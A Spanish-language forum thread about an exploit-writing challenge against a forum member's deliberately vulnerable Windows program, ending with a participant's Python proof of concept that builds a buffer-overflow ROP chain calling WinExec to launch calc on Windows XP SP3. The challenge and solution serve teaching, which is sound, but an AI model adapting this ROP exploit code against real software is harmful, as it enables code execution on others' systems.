comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Reto Genera Tu Exploit!

  • 6 Respuestas
  • 9000 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Octubre 11, 2012, 05:49:45 pm »
Bueno Me hice un tiempo lejos de la Facultad y se me dio por Programar este Pequeño Reto.
Se Trata de Generar un Exploit Propio para mi Aplicaccion.

Que es un Exploit?

Exploit (del inglés to exploit, explotar o aprovechar) es crear una pieza de software, o una secuencia de comandos con el fin de causar un error o un fallo en alguna aplicación, a fin de causar un comportamiento no deseado o imprevisto en este y lograr ejecutar codigo Arbitrario. Lo Cual el Programa Original no Estaba Destinado a Lograr.

Aca el Link de la Aplicacion: (Actualizado)

https://mega.co.nz/#!GMcSzC6R!WgklolMkOAOOQav8oak1UlbOBWwUa8tDuObmQo_mXes

Un Pantallazo para que vean q es vulnerable:



Reglas:
1- Postear un Pantallazo de una Aplicacion q se ejecuta con el Exploit Tapando el Codigo Mostrado en Consola.
2- Mandarme por MP el Script con el q desarrollaron el Exploit para corroborar q realmente explotaron el fallo y no se bajaron algun code de Internet.
3- No den Pistas, y por favor no Publiquen la Solucion hasta q de por Concluido el Reto.


Se tomara en Cuenta a los 5 Primeros q Resuelvan el Reto:


1°  Snakingmax
2°  Erroneo0 Excelente aplicación de Ret2Libc en win!



« Última modificación: Enero 19, 2016, 12:19:06 am por hdbreaker »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado snakingmax

  • *
  • Underc0der
  • Mensajes: 87
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Blog de SnakingMax
    • Email
« Respuesta #1 en: Noviembre 24, 2012, 02:03:27 pm »
Ya que nadie lo resuelve os envío mi solución rápida y chapucera hardcodeando direcciones  ;D



La shellcode del exploit lanza el cmd.exe de windows tal y como se puede ver en la imagen.

Modifico el post para dar la solución ejecutando calc.exe:

« Última modificación: Noviembre 24, 2012, 03:07:34 pm por snakingmax »

Desconectado pekeinfo

  • *
  • Underc0der
  • Mensajes: 30
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Septiembre 02, 2013, 02:01:42 pm »
llegue tarde :( podría alguien resubirlo aun que sea como entretenimiento. thx

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Septiembre 02, 2013, 04:55:21 pm »
Ya le avise a HD_Breaker para que lo resuba. Se va a fijar si lo tiene en su pc y sino lo volvera a crear! Asique cuenten con el reto!

Saludos!
ANTRAX


Desconectado pekeinfo

  • *
  • Underc0der
  • Mensajes: 30
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Septiembre 02, 2013, 08:56:10 pm »
thx aunque ahora es un poco tarde para ponerme mañana lo miro :)

Desconectado pekeinfo

  • *
  • Underc0der
  • Mensajes: 30
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Septiembre 05, 2013, 05:25:48 pm »
no me entra el rop :(, y me toca hacerlo a mano por lo que tardare un poco mas :/. y hay pocas dll por lo que la búsqueda se me complica  un poquito XD. eso sumado a que el stack es poco pequeño ...

Desconectado .:UND3R:.

  • *
  • Underc0der
  • Mensajes: 226
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Marzo 22, 2018, 03:21:11 am »
Han pasado 6 años y tan solo dos participantes han entregado una solución, por lo cual he decidido publicar la mía por si alguien le puede mejorar y así aprendemos todos. El tamaño del payload es de 80 bytes existiendo un límite de 175 caracteres permitidos para poder realizar un BoF normal en vez de un BoF SEH (el cual en mi sistema no pude encontrar ROP Gadgets que permitieran saltar de SEH a nSEH con DEP activado).

Imágenes

Ejecución de la calculadora


Ejecución de CMD

PoC programado en Python
Código: Python
  1. # Operating system = Microsoft Windows XP Profesional Version 2002 Service Pack 3
  2. # Language         = Spanish
  3. # Author           = UND3R
  4. # Size             = 80 bytes
  5. # WinExec(calc, -1)
  6.  
  7. import struct
  8. from struct import pack
  9.  
  10. junk = 'A' * 44
  11. eip = pack("<I",0x7c91120f)     # ntdll.dll | RETN
  12. rop1 = pack("<I",0x7c912486)    # ntdll.dll | POP EDI / RETN
  13. rop2 = pack("<I",0x7c91120f)    # ntdll.dll | RETN
  14. rop3 = pack("<I",0x7c911d52)    # ntdll.dll | POP ESI / RETN
  15. rop4 = pack("<I",0x7c8623ad)    # kernel32.dll | WinExec
  16. rop5 = pack("<I",0x7c80dfdd)    # kernel32.dll | POP EBX / RETN
  17. rop6 = pack("<I",0xffffffff)
  18. rop7 = pack("<I",0x7c95d22b)    # ntdll.dll | PUSHAD / RETN
  19. rop8 = 'calc'
  20.  
  21. payload = junk + eip + rop1 + rop2 + rop3 + rop4 + rop5 + rop6 + rop7 + rop8
  22.  
  23. f = open('config.txt', 'w')
  24. f.write(payload)
  25. f.close()

Espero que les haya gustado mi ROP Gadgets, saludos

.:UND3R:.

 

¿Te gustó el post? COMPARTILO!



Reto "Crackea el Menú"

Iniciado por Zekro

Respuestas: 2
Vistas: 1845
Último mensaje Noviembre 29, 2012, 05:57:24 pm
por Zekro
[Solucionario] Reto "Descubre la frase"

Iniciado por q3rv0

Respuestas: 10
Vistas: 3925
Último mensaje Agosto 13, 2012, 04:24:40 pm
por hdbreaker
Un Crackme que hice hace tiempo, haber si alguien lo resuelve [RETO]

Iniciado por LauBuru

Respuestas: 2
Vistas: 2319
Último mensaje Abril 04, 2016, 12:07:45 pm
por rush
[RETO] Wargame Cifrado - Nivel facil/medio

Iniciado por fermino

Respuestas: 12
Vistas: 3628
Último mensaje Septiembre 25, 2014, 06:25:33 pm
por fermino
[RETO] Desofusca mi codigo y dime por que siempre gano ;)

Iniciado por 79137913

Respuestas: 9
Vistas: 3944
Último mensaje Febrero 15, 2013, 07:05:19 pm
por alexander1712